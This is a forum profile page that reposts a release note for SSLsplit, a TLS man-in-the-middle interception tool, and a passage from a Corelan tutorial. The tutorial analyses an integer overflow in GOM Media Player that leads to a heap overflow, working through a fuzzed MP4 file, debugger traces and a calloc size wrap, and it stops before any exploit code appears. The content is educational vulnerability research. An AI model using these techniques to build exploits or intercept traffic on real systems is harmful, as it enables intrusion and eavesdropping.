-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
SSLsplit 0.4.7 Site roe.ch SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing. Changes: This release prevents IETF draft public key pinning by removing HPKP headers from responses. Also, remaining threading issues in daemon mode are fixed, and the connection log now contains the HTTP status code and the size of the response. Download: http://packetstormsecurity.com/files/download/122283/sslsplit-0.4.7.tar.bz2 Sursa: SSLsplit 0.4.7 ? Packet Storm
-
[h=2]Root Cause Analysis – Integer Overflows[/h]Published July 2, 2013 | By Corelan Team (Jason Kratzer) Table of Contents [hide] Foreword Introduction Analyzing the Crash Data Identifying the Cause of Exception Page heap Initial analysis [*]Reversing the Faulty Function [*]Determining Exploitability Challenges Prerequisites Heap Basics Lookaside Lists Freelists [*]Preventative Security Measures Safe-Unlinking Heap Cookies [*]Application Specific Exploitation Thoughts on This Attack [*]Generic Exploitation Methods Lookaside List Overwrite Overview Application Specific Technique Why Not? [*]Brett Moore: Wrecking Freelist[0] Since 2005 [*]Freelist[0] Insert Attack Overview Application Specific Technique Why Not? [*]Freelist[0] Searching Attack Overview Application Specific Technique Why Not? [*]Conclusion Recommended Reading [*]Share this: [*]Related Posts: [h=3]Foreword[/h] Over the past few years, Corelan Team has received many exploit related questions, including "I have found a bug and I don’t seem to control EIP, what can I do ?"; "Can you write a tutorial on heap overflows" or "what are Integer overflows". In this article, Corelan Team member Jason Kratzer (pyoor) tries to answer some of these questions in a very practical, hands-on way. He went to great lengths to illustrate the process of finding a bug, taking the crash information and reverse engineering the crash context to identifying the root cause of the bug, to finally discussing multiple ways to exploit the bug. Of course, most – if not all – of the techniques in this document were discovered many years ago, but I’m sure this is one of the first (public) articles that shows you how to use them in a real life scenario, with a real application. Although the techniques mostly apply to Windows XP, we believe it is required knowledge, necessary before looking at newer versions of the Windows Operating system and defeating modern mitigation techniques. enjoy ! - corelanc0d3r [h=3]Introduction[/h] In my previous article, we discussed the process used to evaluate a memory corruption bug that I had identified in a recently patched version of KMPlayer. With the crash information generated by this bug we were able to step through the crash, identify the root cause of our exception, and determine exploitability. In doing so, we were able to identify 3 individual methods that could potentially be used for exploitation. This article will serve as a continuation of the series with the intention of building upon some of the skills we discussed during the previous “Root Cause Analysis” article. I highly recommend that if you have not done so already, please review the contents of that article (located here) before proceeding. For the purpose of this article, we’ll be analyzing an integer overflow that I had identified in the GOM Media Player software developed by GOM Labs. This bug affects GOM Media Player 2.1.43 and was reported to the GOM Labs development team on November 19, 2012. A patch was released to mitigate this issue on December 12, 2012. As with our previous bug, I had identified this vulnerability by fuzzing the MP4/QT file formats using the Peach Framework (v2.3.9). In order to reproduce this issue, I have provided a bare bones fuzzing template (Peach PIT) which specifically targets the vulnerable portion of the MP4/QT file format. You can find a copy of that Peach PIT here. The vulnerable version of GOM player can be found here. [h=3]Analyzing the Crash Data[/h] Let’s begin by taking a look at the file, LocalAgent_StackTrace.txt, which was generated by Peach at crash time. I’ve included the relevant portions below: (cdc.5f8): Access violation - code c0000005 (first chance) r eax=00000028 ebx=0000004c ecx=0655bf60 edx=00004f44 esi=06557fb4 edi=06555fb8 eip=063b4989 esp=0012bdb4 ebp=06557f00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 GSFU!DllUnregisterServer+0x236a9: 063b4989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0655c000=???????? kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012bdc0 063b65eb 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x236a9 0012bdd8 063b8605 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x2530b 0012be00 063b8a85 064dcda8 0652afb8 0652afb8 GSFU!DllUnregisterServer+0x27325 0012be18 063b65eb 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x277a5 0012be30 063b8605 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x2530b 0012be58 063b8a85 064dcda8 06510fb8 06510fb8 GSFU!DllUnregisterServer+0x27325 0012be70 063b65eb 064dcda8 06510fb8 06500fb8 GSFU!DllUnregisterServer+0x277a5 <...truncated...> INSTRUCTION_ADDRESS:0x00000000063b4989 INVOKING_STACK_FRAME:0 DESCRIPTION:User Mode Write AV SHORT_DESCRIPTION:WriteAV CLASSIFICATION:EXPLOITABLE BUG_TITLE:Exploitable - User Mode Write AV starting at GSFU!DllUnregisterServer+0x00000000000236a9 (Hash=0x1f1d1443.0x00000000) EXPLANATION:User mode write access violations that are not near NULL are exploitable. (You can download the complete Peach crash data here) As we can see here, we’ve triggered a write access violation by attempting to write the value of edx to the location pointed at by [ecx+eax*4]. This instruction fails of course because the location [ecx+eax*4] points to an inaccessible region of memory. (0655c000=????????) Since we do not have symbols for this application, the stack trace does not provide us with any immediately evident clues as to the cause of our exception. Furthermore, we can also see that !exploitable has made the assumption that this crash is exploitable due to the fact that the faulting instruction attempts to write data to an out of bounds location and that location is not near null. It makes this distinction because a location that is near null may be indicative of a null pointer dereference and these types of bugs are typically not exploitable (though not always). Let’s try and determine if !exploitable is in fact, correct in this assumption. [h=3]Identifying the Cause of Exception[/h] [h=4]Page heap[/h] Before we begin, there’s something very important that we must discuss. Take a look at the bare bones Peach PIT I’ve provided; particularly the Agent configuration beginning at line 55. <Agent name="LocalAgent"> <Monitor class="debugger.WindowsDebugEngine"> <Param name="CommandLine" value="C:\Program Files\GRETECH\GomPlayer\GOM.EXE "C:\fuzzed.mov"" /> <Param name="StartOnCall" value="GOM.EXE" /> </Monitor> <Monitor class="process.PageHeap"> <Param name="Executable" value="GOM.EXE"/> </Monitor> </Agent> Using this configuration, I’ve defined the primary monitor as the “WindowsDebugEngine” which uses PyDbgEng, a wrapper for the WinDbg engine dbgeng.dll, in order to monitor the process. This is typical of most Peach fuzzer configurations under windows. However, what’s important to note here is the second monitor, “process.PageHeap”. This monitor enables full page heap verification by using the Microsoft Debugging tool, GFlags (Global Flags Editor). In short, GFlags is a utility that is packaged with the Windows SDK, and enables users to more easily troubleshoot potential memory corruption issues. There are a number of configuration options available with GFlags. For the purpose of this article, we’ll only be discussing 2: standard and full page heap verification. When using page heap verification, a special page header prefixes each heap chunk. The image below displays the structure of a standard (allocated) heap chunk and the structure of an (allocated) heap chunk with page heap enabled. This information can also be extracted by using the following display types variables: # Displays the standard heap metadata. Replace 0xADDRESS with the heap chunk start address dt _HEAP_ENTRY 0xADDRESS # Displays the page heap metadata. Replace 0xADDRESS with the start stamp address. dt _DPH_BLOCK_INFORMATION 0xADDRESS One of the most important additions to the page heap header is the "user stack traces" (+ust) field. This field contains a pointer to the stack trace of our allocated chunk. This means that we’re now able to enumerate which functions eventually lead to the allocation or free of a heap chunk in question. This is incredibly useful when trying to track down the root cause of our exception. Both standard and full heap verification prefix each chunk with this header. The primary difference between standard and full page heap verification is that under standard heap verification, fill patterns are placed at the end of each heap chunk (0xa0a0a0a0). If for instance a buffer overflow were to occur and data was written beyond the boundary of the heap chunk, the fill pattern located at the end of the chunk would be overwritten and therefore, corrupted. When our now corrupt block is accessed by the heap manager, the heap manager will detect that the fill pattern has been modified/corrupted and cause an access violation to occur. With full page heap verification enabled, rather than appending a fill pattern, each heap chunk is placed at the end of a (small) page. This page is followed by another (small) page that has the PAGE_NOACCESS access level set. Therefore, as soon as we attempt to write past the end of the heap chunk, an access violation will be triggered directly (in comparison with having to wait for a call to the heap manager). Of course, the use of full page heap will drastically change the heap layout, because a heap allocation will trigger the creation of a new page. In fact, the application may even run out of heap memory space if your application is performing a lot of allocations. For a full explanation of GFlags, please take a look at the MSDN documentation here. Now the reason I’ve brought this up, is that in order to replicate the exact crash generated by Peach, we’ll need to enable GFlags for the GOM.exe process. GFlags is part of the Windows Debugging Tools package which is now included in the Windows SDK. The Windows 7 SDK, which is recommended for both Windows XP and 7 can be found here. In order to enable full page heap verification for the GOM.exe process, we’ll need to execute the following command. C:\Program Files\Debugging Tools for Windows (x86)>gflags /p /enable GOM.exe /full [h=4]Initial analysis[/h] With that said, let’s begin by comparing our original seed file and mutated file using the 010 Binary Editor. Please note that in the screenshot below, “Address A” and “Address B” correlate with OriginalSeed.mov and MutatedSeed.mov respectively. Here we can see that our fuzzer applied 8 different mutations and removed 1 block element entirely (as identified by our change located at offset 0x12BE). As documented in the previous article, you should begin by reverting each change, 1 element at a time, from their mutated values to those found in the original seed file. After each change, save the updated sample and open it up in GOM Media Player while monitoring the application using WinDbg. windbg.exe "C:\Program Files\GRETECH\GomPlayer\GOM.EXE" "C:\Path-To\MutatedSeed.mov" The purpose here is to identify the minimum number of mutated bytes required to trigger our exception. Rather than documenting each step of the process which we had already outlined in the previous article, we’ll simply jump forward to the end result. Your minimized sample file should now look like the following: Here we can see that a single, 4 byte change located at file offset 0x131F was responsible for triggering our crash. In order to identify the purpose of these bytes, we must identify what atom or container they belong to. Just prior to our mutated bytes, we can see the ASCII string “stsz”. This is known as a FourCC. The QuickTime and MPEG-4 file formats rely on these FourCC strings in order to identify various atoms or containers used within the file format. Knowing that, we can lookup the structure of the “stsz” atom in the QuickTime File Format Specification found here. Size: 0x00000100 Type: 0x7374737A (ASCII stsz) Version: 0x00 Flags: 0x000000 Sample Size: 0x00000000 Number of Entries: 0x8000000027 Sample Size Table(1): 0x000094B5 Sample Size Table(2): 0x000052D4 Looking at the layout of the “stsz” atom, we can see that the value for the “Number of Entries” element has been replaced with a significantly larger value (0×80000027 compared with the original value of 0x3B). Now that we’ve identified the minimum change required to trigger our exception, let’s take a look at the faulting block (GSFU!DllUnregisterServer+0x236a9) in IDA Pro. [h=3]Reversing the Faulty Function[/h] Without any state information, such as register values or memory locations used during run time, we can only make minor assumptions based on the instructions contained within this block. However, armed with only this information, let’s see what we can come up with. Let’s assume that eax and edx are set to 0×00000000 and that esi points to 0xAABBCCDD A single byte is moved from the location pointed at by esi to edx resulting in edx == 0x000000AA A single byte is moved from the location pointed at by [esi+1] to ecx edx is shifted left by 8 bytes resulting in 0x0000AA00 ecx is added to @edx resulting in 0x0000AABB A single byte is moved from the location pointed at by [esi+2] to ecx edx is again shifted left by 8 bytes resulting in 0x00AABB00 ecx is again added to edx resulting in 0x00AABBCC A single byte is moved from the location pointed at by [esi+3] to ecx edx is again shifted left by 8 bytes resulting in 0xAABBCC00 And finally, ecx is added to edx resulting in 0xAABBCCDD So what does this all mean? Well, our first 10 instructions appear to be an overly complex version of the following instruction: movzx edx, dword ptr [esi] However, upon closer inspection what we actually see is that due to the way bytes are stored in memory, this function is actually responsible for reversing the byte order of the input string. So our initial read value of 0×41424344 (ABCD) will be written as 0×44434241 (DCBA). With that said, let’s reduce our block down to: loc_3B04960: cmp ebx, 4 jl short loc_3B0499D ; Jump outside of our block movzx edx, dword ptr [esi] ; Writes reverse byte order ([::-1]) mov ecx, [edi+28h] mov ecx, [ecx+10h] mov [ecx+eax*4], edx ; Exception occurs here. ; Write @edx to [ecx+eax*4] mov edx, [edi+28h] mov ecx, [edx+0Ch] add esi, 4 sub ebx, 4 inc eax cmp eax, ecx jb short loc_3B04960 Now before we actually observe our block in the debugger, there are still a few more characteristics we can enumerate. The value pointed to by esi is moved to edx edx is then written to [ecx+eax*4] The value of esi is increased by 4 The value of ebx is decreased by 4 eax is incremented by 1 The value of eax is compared against ecx. If eax is equal to ecx, exit the block. Otherwise, jump to our first instruction. Once at the beginning of our block, ebx is then compared against 0×4. If ebx is less than 4, exit the block. Otherwise, perform our loop again. To summarize, our first instruction attempts to determine if ebx is less than or equal to 4. If it is not, we begin our loop by moving a 32 bit value at memory location “A” and write it to memory location “B”. Then we check to make sure eax is not equal to ecx. If it isn’t, then we return to the beginning of our loop. This process will continue, performing a block move of our data until one of our 2 conditions are met. With a rough understanding of the instruction set, let’s observe its behavior in our debugger. We’ll set the following breakpoints which will halt execution if either of our conditions cause our block iteration to exit and inform us of what data is being written and to where. r @$t0 = 1 bp GSFU!DllUnregisterServer+0x23680 ".printf \"Block iteration #%p\\n\", @$t0; r @$t0 = @$t0 + 1; .if (@ebx <= 0x4) {.printf \"1st condition is true. Exiting block iteration\\n\"; } .else {.printf \"1st condition is false (@ebx == 0x%p). Performing iteration\\n\", @ebx; gc}" bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4); gc" bp GSFU!DllUnregisterServer+0x236b9 ".if (@eax == @ecx) {.printf \"2nd is false. Exiting block iteration.\\n\\n\"; } .else {.printf \"2nd condition is true. ((@eax == 0x%p) <= (@ecx == 0x%p)). Performing iteration\\n\\n\", @eax, @ecx; gc}" With our breakpoints set, you should see something similar to the following: Block iteration #00000001 1st condition is false (@ebx == 0x000000ec). Performing iteration The value, 0x000094b5, is taken from 0x07009f14 and written to 0x0700df60 2nd condition is true. ((@eax == 0x00000001) <= (@ecx == 0x80000027)). Performing iteration Block iteration #00000002 1st condition is false (@ebx == 0x000000e8). Performing iteration The value, 0x000052d4, is taken from 0x07009f18 and written to 0x0700df64 2nd condition is true. ((@eax == 0x00000002) <= (@ecx == 0x80000027)). Performing iteration ...truncated... Block iteration #00000028 1st condition is false (@ebx == 0x00000050). Performing iteration The value, 0x00004fac, is taken from 0x07009fb0 and written to 0x0700dffc 2nd condition is true. ((@eax == 0x00000028) <= (@ecx == 0x80000027)). Performing iteration Block iteration #00000029 1st condition is false (@ebx == 0x0000004c). Performing iteration The value, 0x00004f44, is taken from 0x07009fb4 and written to 0x0700e000 (1974.1908): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000028 ebx=0000004c ecx=0700df60 edx=00004f44 esi=07009fb4 edi=07007fb8 eip=06e64989 esp=0012bdb4 ebp=07009f00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 GSFU!DllUnregisterServer+0x236a9: 06e64989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0700e000=???????? Here we can see that neither of our conditions caused our block iteration to exit. Our instruction block performed 0×29 writes until a memory boundary was reached (likely caused by our full page heap verification) which triggers an access violation. Using the ‘db’ command, we let’s take a look at the data we’ve written. 0:000> db 0x0700df60 0700df60 b5 94 00 00 d4 52 00 00-a8 52 00 00 2c 52 00 00 .....R...R..,R.. 0700df70 7c 52 00 00 80 52 00 00-a4 52 00 00 28 53 00 00 |R...R...R..(S.. 0700df80 18 53 00 00 94 52 00 00-20 53 00 00 ac 52 00 00 .S...R.. S...R.. 0700df90 28 53 00 00 e0 51 00 00-d0 52 00 00 88 52 00 00 (S...Q...R...R.. 0700dfa0 e0 52 00 00 94 52 00 00-18 53 00 00 14 52 00 00 .R...R...S...R.. 0700dfb0 14 52 00 00 5c 52 00 00-34 52 00 00 08 52 00 00 .R..\R..4R...R.. 0700dfc0 d4 51 00 00 84 51 00 00-d8 51 00 00 d8 50 00 00 .Q...Q...Q...P.. 0700dfd0 3c 51 00 00 04 52 00 00-a4 51 00 00 bc 50 00 00 <q...r...q...p.. Now let’s break down the information returned by our breakpoints: First, taking a look at our write instructions we can see that the data being written appears to be the contents of our “Sample Size Table”. Our vulnerable block is responsible for reading 32 bits during each iteration from a region of memory beginning at 0x07009F14 and writing it to a region beginning at 0x0700DF60 (these addresses may be different for you and will likely change after each execution). This is good a good sign as it means that we can control what data is being written. Furthermore, we can see that during our second condition, eax is being compared against the same value being provided as the “Number of Entries” element within our “stsz” atom. This means that we can control at least 1 of the 2 conditions which will determine how many times our write instruction occurs. This is good. As with our previous example (KMPlayer), we demonstrated that if we can write beyond the intended boundary of our function, we may be able to overwrite sensitive data. As for our first condition, it’s not yet apparent where the value stored in ebx is derived. More on this in a bit. At this point, things are looking pretty good. So far we’ve determined that we can control the data we write and at least one of our conditions. However, we still haven’t figured out yet why we’re writing beyond our boundary and into the guard page. In order to determine this, we’ll need to enumerate some information regarding the region where our data is being written, such as the size and type (whether it be stack, heap, or virtually allocated memory). To do so, we can use corelan0cd3r’s mona extension for WinDbg. Before we do however, we’ll need to modify Gflags to only enable standard page heap verification. The reason for this is that when using full page heap verification, Gflags will modify our memory layout in such a way that will not accurately reflect our memory state when run without GFlags. To enable standard page heap verification, we’ll execute the following command: gflags.exe /p /enable gom.exe Next, let’s go ahead and start our process under WinDbg. This time, we’ll only apply 1 breakpoint in order to halt execution upon execution of our first write instruction. 0:000> bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4)" Bp expression 'GSFU!DllUnregisterServer+0x236a9' could not be resolved, adding deferred bp 0:000> g The value, 0x000094b5, is taken from 0x06209c4c and written to 0x06209dc0 eax=00000000 ebx=000000ec ecx=06209dc0 edx=000094b5 esi=06209c4c edi=06209bb8 eip=06034989 esp=0012bdb4 ebp=06209c38 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 GSFU!DllUnregisterServer+0x236a9: 06034989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:06209dc0=00000000 0:000> !py mona info -a 0x06209dc0 Hold on... [+] Generating module info table, hang on... - Processing modules - Done. Let's rock 'n roll. [+] NtGlobalFlag: 0x02000000 0x02000000 : +hpa - Enable Page Heap [+] Information about address 0x06209dc0 {PAGE_READWRITE} Address is part of page 0x06200000 - 0x0620a000 This address resides in the heap Address 0x06209dc0 found in _HEAP @ 06200000, Segment @ 06200680 ( bytes ) (bytes) HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state 06209d98 000000d8 00000050 00000014 [03] 06209dc0 000000a4 0000000c Extra present,Busy (hex) 00000216 00000080 00000020 00000164 00000012 Extra present,Busy (dec) Chunk header size: 0x8 (8) Extra header due to GFlags: 0x20 (32) bytes DPH_BLOCK_INFORMATION Header size: 0x20 (32) StartStamp : 0xabcdaaaa Heap : 0x86101000 RequestedSize : 0x0000009c ActualSize : 0x000000c4 TraceIndex : 0x0000193e StackTrace : 0x04e32364 EndStamp : 0xdcbaaaaa Size initial allocation request: 0xa4 (164) Total space for data: 0xb0 (176) Delta between initial size and total space for data: 0xc (12) Data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... [+] Disassembly: Instruction at 06209dc0 : ADD BYTE PTR [EAX],AL Output of !address 0x06209dc0: Usage: <unclassified> Allocation Base: 06200000 Base Address: 06200000 End Address: 0620a000 Region Size: 0000a000 Type: 00020000.MEM_PRIVATE State: 00001000.MEM_COMMIT Protect: 00000004.PAGE_READWRITE Good. So here we can see that we’re writing to an allocated heap chunk. The requested size of our block is 0x9C. Based on our access violation, we can already determine that the current state of our mutated file will attempt to write more than 0x9C bytes of data. After 0x9C bytes, our boundary is reached and an access violation is triggered. Considering the structure in which we’re writing our data, it appears as if we’ve identified a very simple example of a heap overflow. If we are able to control the length of the data being written and another heap chunk sits in a location following our written data, we may be able to write beyond the bounds of our chunk and corrupt the metadata (chunk header) of the following chunk, or application data stored in that adjacent chunk (that is of course with GFlags disabled). More on this later. However, before we attempt to do so, we still have not determined the actual cause of our exception. Why is it that we are allocating a region that is only 0x9C bytes, yet attempting to write significantly more? Our next step in the process will be to determine where our allocated size of 0x9C comes from. Is this some value specified in the file? There are in in fact several methods we could use to determine this. We could set a breakpoint on all heap allocations of size 0x9C. Once we’ve identified the appropriate allocation, we can then look into the calling function in order to determine where the size is derived. Fortunately for us, with GFlags enabled, that is unnecessary. As I mentioned earlier, when page heap verification is enabled, a field within the page heap header contains a pointer to the stack trace of our allocated block. A pointer to this stack trace is listed in !mona’s output under DPH_BLOCK_INFORMATION*** table (highlighted above). This allows us to see which functions were called just prior to our allocation. This information can also be obtained without !mona by using the !heap command while supplying an address within the heap chunk: !heap –p –a 0x06209dc0 You can also retrieve this information using the ‘dt’ command and the address of the chunk’s “StartStamp”. dt _DPH_BLOCK_INFORMATION 0x06209da0. With that said, let’s use the ‘dds’ command to display the stack trace of the allocated chunk. 0:000> dds 0x04e32364 04e32364 abcdaaaa 04e32368 00000001 04e3236c 00000004 04e32370 00000001 04e32374 0000009c 04e32378 06101000 04e3237c 04fbeef8 04e32380 04e32384 04e32384 7c94b244 ntdll!RtlAllocateHeapSlowly+0x44 04e32388 7c919c0c ntdll!RtlAllocateHeap+0xe64 04e3238c 0609c2af GSFU!DllGetClassObject+0x29f8f 04e32390 06034941 GSFU!DllUnregisterServer+0x23661 Here we can see two GOM functions (GSFU!DLLUnregisterServer and GSFU!DLLGetClassObject) are called prior to the allocation. First, let’s take a quick glance at the function just prior to our call to ntdll!RtlAllocateHeap using IDA Pro. So as we would expect, here we can see a call to HeapAlloc. The value being provided as dwBytes would be 0x9C (our requested size). It’s important to note here that IDA Pro, unlike WinDbg, has the ability to enumerate functions such as this. When it identifies a call to a known function, it will automatically apply comments in order to identify known variables supplied to that function. In the case of HeapAlloc (ntdll!RtlAllocateHeap), it will accept 3 arguments; dwBytes (size of the allocation), dwFlags, and hHeap (a pointer to the owning heap). More information on this function can be found at the MSDN page here. Now in order to identify where the value of dwBytes is introduced, let’s go ahead and take a quick look at the previous function (GSFU!DllUnregisterServer+0×23661) in our stack trace. Interesting. Here we can see that a call to the Calloc function is made, which in turn calls HeapAlloc. Before we continue, we need to have a short discussion about Calloc. Calloc is a function used to allocate a contiguous block of memory when parsing an array. It accepts two arguments: size_t num ; Number of Objects size_t size ; Size of Objects It will allocate a region of memory using a size derived by multiplying both arguments (Number of Objects * Size of Objects). Then, by calling memset it will zero initialize the array (not really important for the purpose of this article). What is important to note however, is that rather than using the CRT version of Calloc (msvcrt!calloc), an internal implementation is used. We can see this by following the call (the code is included in the GSFU module rather than making an external call to msvcrt)***. The importance of this will become clear very soon. You can easily follow any call in IDA Pro by simply clicking on the called function. In this case, clicking on “_calloc” will bring us to our inlined function. We can determine that the function has been inlined as GSFU.ax is our only loaded module. A jump to the msvcrt!calloc function would be displayed by an “extrn”, or external, data reference (DREF). Now, with a quick look at our two calling functions, let’s go ahead and set a one time breakpoint on the first value being supplied to Calloc so that once it is hit, another breakpoint is applied to ntdll!RtlAllocateHeap. Then, we’ll trace until ntdll!RtlAllocateHeap is hit. Let’s go ahead and apply the following breakpoint, and then tell the process to continue running (g) 0:000> bp GSFU!DllUnregisterServer+0x23653 /1 "bp ntdll!RtlAllocateHeap; ta" Bp expression 'GSFU!DllUnregisterServer+0x23653 /1' could not be resolved, adding deferred bp 0:000> g eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23653 06034933 52 push edx ; Number of Elements eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23654: 06034934 6a04 push 4 ; Size of Elements eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034936 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23656: 06034936 83c604 add esi,4 eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8 eip=06034939 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 GSFU!DllUnregisterServer+0x23659: 06034939 83eb0c sub ebx,0Ch eax=050d9d70 ebx=000000ec ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8 eip=0603493c esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212 GSFU!DllUnregisterServer+0x2365c: 0603493c e8e6780600 call GSFU!DllGetClassObject+0x29f07 (0609c227) ; Calloc ...truncated... eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8 eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206 GSFU!DllGetClassObject+0x29f16: 05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027 eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=050d9bb8 eip=05d5c23a esp=0012bd78 ebp=0012bda4 iopl=0 ov up ei pl nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200a07 GSFU!DllGetClassObject+0x29f1a: 05d5c23a 8975e0 mov dword ptr [ebp-20h],esi ss:0023:0012bd84=0012d690 ...truncated... eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a0 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f80: 05d5c2a0 56 push esi ; Allocation Size eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a1 esp=0012bd74 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f81: 05d5c2a1 6a08 push 8 ; Flags eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a3 esp=0012bd70 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f83: 05d5c2a3 ff35a0cada05 push dword ptr [GSFU!DllGetClassObject+0x7a780 (05dacaa0)] ds:0023:05dacaa0=05dc0000 ; HeapHandle eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a9 esp=0012bd6c ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f89: 05d5c2a9 ff15ece0d605 call dword ptr [GSFU!DllGetClassObject+0x3bdcc (05d6e0ec)] ds:0023:05d6e0ec={ntdll!RtlAllocateHeap (7c9100c4)} Breakpoint 1 hit eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=7c9100c4 esp=0012bd68 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 ntdll!RtlAllocateHeap: 7c9100c4 6804020000 push 204h When analyzing operations like this, I typically find it best to start from the bottom up. Since we already know that our requested allocation size is 0x9C, we can begin at the point where the value 0x9C is provided as the dwBytes argument for ntdll!RtlAllocateHeap (GSFU!DllGetClassObject+0x29f80). The next thing we need to do is look for the instruction, prior to our push instruction, that either introduces the value 0x9C to esi or modifies it. Looking back a few lines, we see this instruction: eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8 eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206 GSFU!DllGetClassObject+0x29f16: 05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027 Interesting. It appears that we’re performing signed multiplication of the value contained in esi (0×4) and our “Number of Entries” element within the “stsz” atom (as pointed to by our stack entry located at 0x0012bdb0). This makes sense since Calloc, as we had previously discussed, will perform an allocation of data with a size of (Number of Elements * Size of Elements). However, there seems to be a problem with our math. When multiplying 0×80000027 * 0×4, our result should be 0x20000009C rather than 0x0000009C. The reason for this is that we’re attempting to store a value larger than what our 32 bit register can hold. When doing so, an integer overflow occurs and our result is “wrapped,” causing only the 32 least significant bits to be stored in our register. With this, we can control the size of our allocations by manipulating the value contained within our “Number of Entries” element. By allocating a chunk smaller than the data we intend to write, we can trigger a heap overflow. However, the root cause of our issue is not exactly as clear as it may seem. When we looked at our function in IDA Pro earlier, we determined that rather than using the CRT version of calloc (msvcrt!calloc), GOM used a wrapped version instead. Had the actual Calloc function been used, this vulnerability would not exist. To explain this, let’s take a look at the code snippet below: #include <stdio.h> #include <malloc.h> int main( void ) { int size = 0x4; // Size of Element int num = 0x80000027; // Number of Elements int *buffer; printf( "Attempting to allocate a buffer with size: 0x20000009C" ); buffer = (int *)calloc( size, num ); // Size of Element * Number of Elements if( buffer != NULL ) printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) ); else printf( "Failed to allocate buffer.\n" ); free( buffer ); } The example above demonstrates a valid (albeit it, not the best) use of the Calloc. Here we’re trying to allocate an array with a size of 0x200000009C (0×4 * 0×80000027). Let’s see what would happen if we were to compile and run this code: 